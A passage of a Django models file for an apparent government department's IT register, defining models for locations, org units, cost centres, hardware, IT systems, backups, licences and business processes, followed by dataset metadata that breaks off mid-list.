datetime.strftime(self.date_created, '%d-%b-%Y'))\n else:\n return \"{} ({})\".format(\n self.department_user, datetime.strftime(self.date_created, '%d-%b-%Y'))\n\n\nclass Location(models.Model):\n name = models.CharField(max_length=256, unique=True)\n manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True)\n address = models.TextField(unique=True, blank=True)\n pobox = models.TextField(blank=True, verbose_name='PO Box')\n phone = models.CharField(max_length=128, null=True, blank=True)\n fax = models.CharField(max_length=128, null=True, blank=True)\n email = models.CharField(max_length=128, null=True, blank=True)\n point = models.PointField(null=True, blank=True)\n url = models.CharField(max_length=2000, help_text=\"URL to webpage with more information\", null=True, blank=True)\n bandwidth_url = 
models.CharField(max_length=2000, help_text=\"URL to prtg graph of bw utilisation\", null=True, blank=True)\n\n def __str__(self):\n return \"{} ({})\".format(self.name, self.address)\n\n def as_dict(self):\n return {k: getattr(self, k) for k in (\"name\", \"address\", \"pobox\", \"phone\", \"fax\", \"email\") if getattr(self, k)}\n\n def save(self, *args, **kwargs):\n for orgunit in self.orgunit_set.all():\n orgunit.save()\n super(Location, self).save(*args, **kwargs)\n\n class Meta:\n ordering = ('name',)\n\n\nclass SecondaryLocation(models.Model):\n location = models.ForeignKey(Location)\n name = models.CharField(max_length=256, unique=True)\n manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True)\n phone = models.CharField(max_length=128, null=True, blank=True)\n fax = models.CharField(max_length=128, null=True, blank=True)\n email = models.CharField(max_length=128, null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n def save(self, *args, **kwargs):\n for orgunit in self.orgunit_set.all():\n orgunit.save()\n super(SecondaryLocation, self).save(*args, **kwargs)\n\n def as_dict(self):\n return {k: getattr(self, k) for k in (\"name\", \"phone\", \"fax\", \"email\") if getattr(self, k)}\n\n\nclass OrgUnit(MPTTModel):\n TYPE_CHOICES = (\n (0, \"Department\"),\n (1, \"Division\"),\n (2, \"Branch\"),\n (3, \"Region\"),\n (4, \"Cost Centre\"),\n (5, \"Office\"),\n (6, \"District\"),\n (7, \"Section\"),\n )\n TYPE_CHOICES_DICT = dict(TYPE_CHOICES)\n unit_type = models.PositiveSmallIntegerField(choices=TYPE_CHOICES, default=4)\n ad_guid = models.CharField(max_length=48, unique=True, null=True, editable=False)\n ad_dn = models.CharField(max_length=512, unique=True, null=True, editable=False)\n name = models.CharField(max_length=256, unique=True)\n acronym = models.CharField(max_length=16, null=True, blank=True)\n manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True)\n parent = TreeForeignKey('self', on_delete=models.PROTECT, null=True, blank=True, related_name='children', db_index=True)\n details = JSONField(null=True, blank=True)\n location = models.ForeignKey(Location, on_delete=models.PROTECT, null=True, blank=True)\n secondary_location = models.ForeignKey(SecondaryLocation, on_delete=models.PROTECT, null=True, blank=True)\n\n def cc(self):\n try:\n return self.costcentre\n except:\n return None\n\n def __str__(self):\n name = self.name\n if self.acronym:\n name = \"{} - {}\".format(self.acronym, name)\n if self.cc():\n return \"{} - CC{}\".format(name, self.cc())\n return name\n\n def members(self):\n from tracking.models import DepartmentUser\n return DepartmentUser.objects.filter(org_unit__in=self.get_descendants(include_self=True), **DepartmentUser.ACTIVE_FILTER)\n\n def save(self, *args, **kwargs):\n self.details = self.details or {}\n self.details.update({\n \"type\": self.get_unit_type_display(),\n })\n if self.secondary_location:\n self.location = self.secondary_location.location\n if not getattr(self, \"cheap_save\", False):\n for user in self.departmentuser_set.all():\n user.save()\n super(OrgUnit, self).save(*args, **kwargs)\n\n class MPTTMeta:\n order_insertion_by = ['name']\n\n class Meta:\n ordering = ('name',)\n\n\nclass CostCentre(models.Model):\n name = models.CharField(max_length=25, unique=True, editable=False)\n code = models.CharField(max_length=5, unique=True)\n division = models.ForeignKey(OrgUnit, null=True, editable=False, 
related_name=\"costcentres_in_division\")\n org_position = models.OneToOneField(OrgUnit, unique=True)\n manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"manage_ccs\", null=True, blank=True)\n business_manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"bmanage_ccs\", help_text=\"Business Manager\", null=True, blank=True)\n admin = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"admin_ccs\", help_text=\"Admin\", null=True, blank=True)\n tech_contact = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"tech_ccs\", help_text=\"Technical Contact\", null=True, blank=True)\n\n def save(self, *args, **kwargs):\n self.name = str(self)\n division = self.org_position.get_ancestors(include_self=True).filter(unit_type=1)\n if division:\n self.division = division.first()\n for user in self.departmentuser_set.all():\n user.save()\n super(CostCentre, self).save(*args, **kwargs)\n\n def __str__(self):\n name = '{}'.format(self.code)\n dept = self.org_position.get_ancestors(include_self=True).filter(unit_type=0)\n if dept:\n name += \" ({})\".format(dept.first().acronym)\n return name\n\n class Meta:\n ordering = ('code',)\n\n\nclass Software(models.Model):\n \"\"\"A model to represent a discrete unit of software (OS, runtime, etc.)\n \"\"\"\n name = models.CharField(max_length=2048, unique=True)\n url = models.CharField(max_length=2000, null=True, blank=True)\n license = models.ForeignKey('registers.SoftwareLicense', on_delete=models.PROTECT, null=True)\n os = models.BooleanField(default=False, verbose_name='OS', help_text='Software is an operating system?')\n\n class Meta:\n verbose_name_plural = 'software'\n\n def __str__(self):\n return self.name\n\n\nclass Hardware(tracking.CommonFields):\n device_type = models.PositiveSmallIntegerField(choices=(\n (1, 'Network'), (2, 'Mobile'), (3, 'Domain PC'), (4, 'Hostname')))\n computer = models.OneToOneField(tracking.Computer, null=True, editable=False)\n mobile = models.OneToOneField(tracking.Mobile, null=True, editable=False)\n username = models.CharField(max_length=128, null=True, editable=False)\n email = models.CharField(max_length=512, null=True, editable=False)\n ipv4 = models.TextField(default='', editable=False)\n ports = models.TextField(default='', editable=False)\n name = models.CharField(max_length=2048, unique=True, editable=False)\n serials = models.TextField(null=True, editable=False)\n local_info = models.TextField(null=True, editable=False)\n local_current = models.BooleanField(default=True, help_text='Does local state match central state?')\n os = models.ForeignKey(\n Software, on_delete=models.PROTECT, null=True, blank=True, limit_choices_to={'os': True},\n verbose_name='operating system')\n location = models.ForeignKey(Location, on_delete=models.PROTECT, null=True, blank=True, help_text='Physical location')\n\n def __str__(self):\n return '{}:{} ({})'.format(self.get_device_type_display(), self.name, self.cost_centre)\n\n class Meta:\n unique_together = ('computer', 'mobile')\n ordering = ('name', '-device_type')\n verbose_name_plural = 'hardware'\n\n\nclass Device(tracking.CommonFields):\n TYPE_CHOICES = (\n (0, \"Computer\"),\n (1, \"Mobile\"),\n (2, \"PRTG\"),\n )\n name = models.CharField(max_length=2048, unique=True)\n owner = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, related_name=\"devices_owned\")\n guid = models.CharField(max_length=48, 
unique=True, help_text=\"AD GUID (ad:...) or PRTG object id (prtg:...)\")\n    device_type = models.PositiveSmallIntegerField(choices=TYPE_CHOICES, default=0)\n\n    def __str__(self):\n        return self.name\n\n\nclass UserGroup(models.Model):\n    \"\"\"A model to represent an arbitrary group of users for an IT System.\n    E.g. 'All department staff', 'External govt agency staff', etc.\n    \"\"\"\n    name = models.CharField(max_length=2048, unique=True)\n    user_count = models.PositiveIntegerField(blank=True, null=True)\n\n    def __str__(self):\n        return '{} ({})'.format(self.name, self.user_count)\n\n\nclass ITSystemHardware(models.Model):\n    \"\"\"A model to represent the relationship between an IT System and a\n    Hardware entity.\n    \"\"\"\n    ROLE_CHOICES = (\n        (1, 'Application server'),\n        (2, 'Database server'),\n        (3, 'Network file storage'),\n        (4, 'Reverse proxy'),\n    )\n    host = models.ForeignKey(Hardware, on_delete=models.PROTECT)\n    role = models.PositiveSmallIntegerField(choices=ROLE_CHOICES)\n\n    class Meta:\n        verbose_name_plural = 'IT system hardware'\n        unique_together = ('host', 'role')\n\n    def __str__(self):\n        return '{} ({})'.format(self.host.name, self.role)\n\n\nclass ITSystem(tracking.CommonFields):\n    STATUS_CHOICES = (\n        (0, \"Production\"),\n        (1, \"Development\"),\n        (2, \"Production (Legacy)\"),\n        (3, \"Decommissioned\"),\n        (4, \"Unknown\")\n    )\n    ACCESS_CHOICES = (\n        (1, 'Public Internet'),\n        (2, 'Authenticated Extranet'),\n        (3, 'Corporate Network'),\n        (4, 'Local System (Networked)'),\n        (5, 'Local System (Standalone)')\n    )\n    AUTHENTICATION_CHOICES = (\n        (1, 'Domain Credentials'),\n        (2, 'Single Sign On'),\n        (3, 'Externally Managed')\n    )\n    AVAILABILITY_CHOICES = (\n        (1, '24 hours a day, 7 days a week, 365 days a year'),\n        (2, 'Department core business hours'),\n    )\n    SYSTEM_TYPE_CHOICES = (\n        (1, 'Web application'),\n        (2, 'Client application'),\n        (3, 'Mobile application'),\n        (4, 'Service'),\n    )\n    name = models.CharField(max_length=128, unique=True)\n    system_id = models.CharField(max_length=16, unique=True)\n    acronym = models.CharField(max_length=16, null=True, blank=True)\n    status = models.PositiveSmallIntegerField(choices=STATUS_CHOICES, default=4)\n    status_display = models.CharField(max_length=128, null=True, editable=False)\n    description = models.TextField(blank=True)\n    devices = models.ManyToManyField(Device, blank=True)\n    owner = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, related_name=\"systems_owned\", help_text=\"Application owner\")\n    custodian = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, related_name=\"systems_custodianed\", help_text=\"Application custodian\")\n    data_custodian = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"systems_data_custodianed\", null=True, blank=True)\n    preferred_contact = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"systems_preferred_contact\", null=True, blank=True)\n    link = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to web application\")\n    documentation = models.URLField(max_length=2048, null=True, blank=True, help_text=\"URL to end-user documentation\")\n    technical_documentation = models.URLField(max_length=2048, null=True, blank=True, help_text=\"URL to technical documentation\")\n    status_html = models.URLField(max_length=2048, null=True, blank=True, help_text=\"URL to status/uptime info\")\n    authentication = models.PositiveSmallIntegerField(choices=AUTHENTICATION_CHOICES, default=1)\n    
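# NOTE (editor's annotation, assumption): the *_display fields below appear to cache the human-readable labels of their choice fields; save() repopulates them, presumably so list views and serialisers can read the label without resolving the choices tuples.\n    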
authentication_display = models.CharField(max_length=128, null=True, editable=False)\n    access = models.PositiveSmallIntegerField(choices=ACCESS_CHOICES, default=3)\n    access_display = models.CharField(max_length=128, null=True, editable=False)\n    request_access = models.TextField(blank=True)\n    criticality = models.PositiveIntegerField(choices=CRITICALITY_CHOICES, null=True, blank=True)\n    availability = models.PositiveIntegerField(choices=AVAILABILITY_CHOICES, null=True, blank=True, help_text='Expected availability for this IT System')\n    schema_url = models.URLField(max_length=2048, null=True, blank=True, help_text='URL to schema diagram')\n    user_groups = models.ManyToManyField(UserGroup, blank=True, help_text='User group(s) that use this IT System')\n    softwares = models.ManyToManyField(Software, blank=True, help_text='Software that is used to provide this IT System')\n    hardwares = models.ManyToManyField(ITSystemHardware, blank=True, help_text='Hardware that is used to provide this IT System')\n    bh_support = models.ForeignKey(\n        tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True, related_name=\"bh_support\",\n        verbose_name='business hours support', help_text='Business hours support contact')\n    ah_support = models.ForeignKey(\n        tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True, related_name=\"ah_support\",\n        verbose_name='after hours support', help_text='After-hours support contact')\n    system_reqs = models.TextField(blank=True, help_text='A written description of the requirements to use the system (e.g. web browser version)')\n    system_type = models.PositiveSmallIntegerField(choices=SYSTEM_TYPE_CHOICES, null=True, blank=True)\n    vulnerability_docs = models.URLField(max_length=2048, null=True, blank=True, help_text='URL to documentation related to known vulnerability reports')\n    workaround = models.TextField(blank=True, help_text='Written procedure for users to work around an outage of this system')\n    recovery_docs = models.URLField(max_length=2048, null=True, blank=True, help_text='URL to recovery procedure(s) in the event of system failure')\n    mtd = models.DurationField(help_text=\"Maximum Tolerable Downtime (days hh:mm:ss)\", default=timedelta(days=14))\n    rto = models.DurationField(help_text=\"Recovery Time Objective (days hh:mm:ss)\", default=timedelta(days=7))\n    rpo = models.DurationField(help_text=\"Recovery Point Objective/Data Loss Interval (days hh:mm:ss)\", default=timedelta(hours=24))\n    contingency_plan = models.FileField(\n        blank=True, null=True, max_length=255, upload_to='uploads/%Y/%m/%d',\n        help_text='NOTE: changes to this field will delete current contingency plan approvals.')\n    contingency_plan_status = models.PositiveIntegerField(\n        choices=DOC_STATUS_CHOICES, null=True, blank=True)\n    contingency_plan_approvals = models.ManyToManyField(DocumentApproval, blank=True)\n    contingency_plan_last_tested = models.DateField(\n        null=True, blank=True, help_text='Date that the plan was last tested.')\n\n    def __init__(self, *args, **kwargs):\n        super(ITSystem, self).__init__(*args, **kwargs)\n        # Store the pre-save values of some fields on object init.\n        self.__original_contingency_plan = self.contingency_plan\n\n    def __str__(self):\n        return self.name\n\n    class Meta:\n        verbose_name = \"IT System\"\n        ordering = ['name']\n\n    def description_html(self):\n        return mark_safe(self.description)\n\n    def save(self, *args, **kwargs):\n        if not self.system_id:\n            # Guard the auto-numbering: first() returns None until the first ITSystem exists.\n            last = ITSystem.objects.order_by(\"-pk\").first()\n            self.system_id = \"S{0:03d}\".format(last.pk + 1 if last else 1)\n        self.status_display = self.get_status_display()\n        self.authentication_display = self.get_authentication_display()\n        if not self.link: # systems with no link default to device\n            self.access = 4\n        self.access_display = self.get_access_display()\n        super(ITSystem, self).save(*args, **kwargs)\n
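\n# Usage sketch (illustrative only; pk values are hypothetical): ITSystem.save() above derives\n# the next system_id from the highest existing pk, so if the latest ITSystem has pk 41, a newly\n# saved system is assigned system_id \"S042\"; a system saved without a link is also forced to\n# access 4 ('Local System (Networked)').\n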
\n\nclass Backup(tracking.CommonFields):\n    ROLE_CHOICES = (\n        (0, \"Generic Server\"),\n        (1, \"Domain Controller\"),\n        (2, \"Database Server\"),\n        (3, \"Application Host\"),\n        (4, \"Management Server\"),\n        (5, \"Site Server\"),\n        (6, \"File Server\"),\n        (7, \"Print Server\"),\n        (8, \"Block Storage Server\"),\n        (9, \"Email Server\"),\n        (10, \"Network Device\"))\n    STATUS_CHOICES = (\n        (0, \"Production\"),\n        (1, \"Pre-Production\"),\n        (2, \"Legacy\"),\n        (3, \"Decommissioned\")\n    )\n    SCHEDULE_CHOICES = (\n        (0, \"Manual\"),\n        (1, \"Point in time, 7 day retention\"),\n        (2, \"Daily, 7 day retention\"),\n        (3, \"Daily, 30 day retention\"),\n        (4, \"Weekly, 1 month retention\")\n    )\n    system = models.OneToOneField(Hardware)\n    operating_system = models.CharField(max_length=120)\n    parent_host = models.ForeignKey(Hardware, on_delete=models.PROTECT, null=True, blank=True, related_name=\"host\")\n    role = models.PositiveSmallIntegerField(choices=ROLE_CHOICES, default=0)\n    status = models.PositiveSmallIntegerField(choices=STATUS_CHOICES, default=0)\n    database_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Database backup/restore/logs info\")\n    database_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n    filesystem_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Filesystem backup/restore/logs info\")\n    filesystem_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n    appdata_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Application Data backup/restore/logs info\")\n    appdata_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n    appconfig_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Config for App/Server\")\n    appconfig_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n    os_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Build Documentation\")\n    os_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n    last_tested = models.DateField(null=True, blank=True, help_text=\"Last tested date\")\n    test_schedule = models.PositiveSmallIntegerField(default=12, help_text=\"Test Schedule in Months, 0 for never\")\n    comment = models.TextField(blank=True)\n\n    def next_test_date(self):\n        if self.test_schedule == 0:\n            return \"Doesn't require testing\"\n        if not self.last_tested:\n            return \"NEVER TESTED\"\n        else:\n            return self.last_tested + relativedelta(months=self.test_schedule)\n\n    def test_overdue(self):\n        if self.test_schedule == 0:\n            return False\n        if not self.last_tested:\n            return True\n        return self.next_test_date() < timezone.now().date()\n\n    def __str__(self):\n        return \"{} ({})\".format(self.system.name.split(\".\")[0], self.get_status_display())\n\n    class Meta:\n        ordering = (\"system__name\",)\n\n\nclass Vendor(models.Model):\n    name = models.CharField(max_length=256, unique=True)\n    details = models.TextField(blank=True)\n    # Pass the dict callable, not a shared dict() instance, as the field default.\n    extra_data = JSONField(default=dict, null=True, blank=True)\n\n    def __str__(self):\n        return self.name\n\n\nclass SoftwareLicense(tracking.CommonFields):\n    \"\"\"\n    Represents a 
software licensing arrangement.\n \"\"\"\n name = models.CharField(max_length=256, unique=True)\n url = models.URLField(max_length=2000, null=True, blank=True)\n support = models.TextField(blank=True, help_text='Support timeframe or scope')\n support_url = models.URLField(max_length=2000, null=True, blank=True)\n oss = models.NullBooleanField(default=None, help_text='Open-source/free software license?')\n primary_user = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True)\n devices = models.ManyToManyField(Device, blank=True)\n vendor = models.ForeignKey(Vendor, on_delete=models.PROTECT, null=True, blank=True)\n used_licenses = models.PositiveSmallIntegerField(default=0, editable=False)\n available_licenses = models.PositiveSmallIntegerField(default=0, null=True, blank=True)\n license_details = models.TextField(blank=True, help_text=\"Direct license keys or details\")\n\n def __str__(self):\n return self.name\n\n\nclass BusinessService(models.Model):\n \"\"\"Represents the Department's core business services.\n \"\"\"\n number = models.PositiveIntegerField(unique=True, help_text='Service number')\n name = models.CharField(max_length=256, unique=True)\n description = models.TextField(null=True, blank=True)\n\n def __str__(self):\n return 'Service {}: {}'.format(self.number, self.name)\n\n\nclass BusinessFunction(models.Model):\n \"\"\"Represents a function of the Department, undertaken to meet the\n Department's core services. Each function must be linked to 1+\n BusinessService object.\n \"\"\"\n name = models.CharField(max_length=256, unique=True)\n description = models.TextField(null=True, blank=True)\n services = models.ManyToManyField(BusinessService)\n\n def __str__(self):\n return self.name\n\n\nclass BusinessProcess(models.Model):\n \"\"\"Represents a business process that the Department undertakes in order\n to fulfil one of the Department's functions.\n \"\"\"\n name = models.CharField(max_length=256, unique=True)\n description = models.TextField(null=True, blank=True)\n functions = models.ManyToManyField(BusinessFunction)\n criticality = models.PositiveIntegerField(\n choices=CRITICALITY_CHOICES, null=True, blank=True, help_text='How critical is the process?')\n\n class Meta:\n verbose_name_plural = 'business processes'\n\n def __str__(self):\n return self.name\n\n\nclass ProcessITSystemRelationship(models.Model):\n \"\"\"A model to represent the relationship between a BusinessProcess and an\n ITSystem object.\n \"\"\"\n process = models.ForeignKey(BusinessProcess, on_delete=models.PROTECT)\n itsystem = models.ForeignKey(ITSystem, on_delete=models.PROTECT)\n importance = models.PositiveIntegerField(\n choices=IMPORTANCE_CHOICES, help_text='How important is the IT System to undertaking this process?')\n\n class Meta:\n unique_together = ('process', 'itsystem')\n\n def __str__(self):\n return '{} - {} ({})'.format(self.itsystem.name, self.process.name, self.get_importance_display())\n\n\nclass ITSystemDependency(models.Model):\n \"\"\"A model to represent a dependency that an ITSystem has on another, plus\n the criticality of that dependency.\n \"\"\"\n itsystem = models.ForeignKey(\n ITSystem, on_delete=models.PROTECT, verbose_name='IT System', help_text='The IT System')\n dependency = models.ForeignKey(\n ITSystem, on_delete=models.PROTECT, related_name='dependency',\n help_text='The system which is depended upon by the IT System')\n criticality = models.PositiveIntegerField(\n choices=CRITICALITY_CHOICES, help_text='How critical is the 
dependency?')\n\n class Meta:\n verbose_name = 'IT System dependency'\n verbose_name_plural = 'IT System dependencies'\n unique_together = ('itsystem', 'dependency')\n\n def __str__(self):\n return '{} - {} ({})'.format(self.itsystem.name, self.dependency.name, self.get_criticality_display())\n", "sub_path": "registers/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 25168, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "django.contrib.gis.db.models.Model", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 31, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 35, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 35, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 35, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 36, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.FileField", "line_number": 39, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.DateTimeField", "line_number": 42, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 42, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 51, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 54, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 55, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 55, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 56, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 56, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 56, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 56, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 57, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 57, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 58, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 58, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 59, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 59, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 60, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", 
"line_number": 60, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 61, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 61, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PointField", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 62, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 63, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 63, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 64, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 64, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 81, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 81, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 82, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 82, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 83, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 83, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 84, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 84, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 84, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 84, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 84, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 85, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 85, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 86, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 86, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 87, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 87, "usage_type": "name"}, {"api_name": "mptt.models.MPTTModel", "line_number": 101, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 113, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 113, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 114, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 114, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 115, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 115, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 116, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 116, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 117, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 117, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 118, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 118, "usage_type": "name"}, 
{"api_name": "tracking.models.DepartmentUser", "line_number": 118, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 118, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 118, "usage_type": "attribute"}, {"api_name": "mptt.models.TreeForeignKey", "line_number": 119, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 119, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 119, "usage_type": "name"}, {"api_name": "django.contrib.postgres.fields.JSONField", "line_number": 120, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 121, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 121, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 121, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 122, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 122, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tracking.models.DepartmentUser.objects.filter", "line_number": 140, "usage_type": "call"}, {"api_name": "tracking.models.DepartmentUser.objects", "line_number": 140, "usage_type": "attribute"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 140, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser.ACTIVE_FILTER", "line_number": 140, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 161, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 161, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 162, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 162, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 163, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 163, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 164, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 164, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.OneToOneField", "line_number": 165, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 165, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 166, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 166, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 166, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 166, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 166, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 167, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 167, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 167, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 167, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 167, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 
